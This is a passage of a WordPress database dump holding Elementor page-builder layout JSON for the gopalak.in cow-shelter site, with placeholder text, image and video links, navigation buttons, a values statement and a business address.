leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9155,1574,'_elementor_page_assets','a:0:{}'),(9156,1575,'_elementor_edit_mode','builder'),(9157,1575,'_elementor_template_type','wp-page'),(9158,1575,'_elementor_version','3.7.8'),(9159,1575,'_wp_page_template','elementor_canvas'),(9160,1575,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopala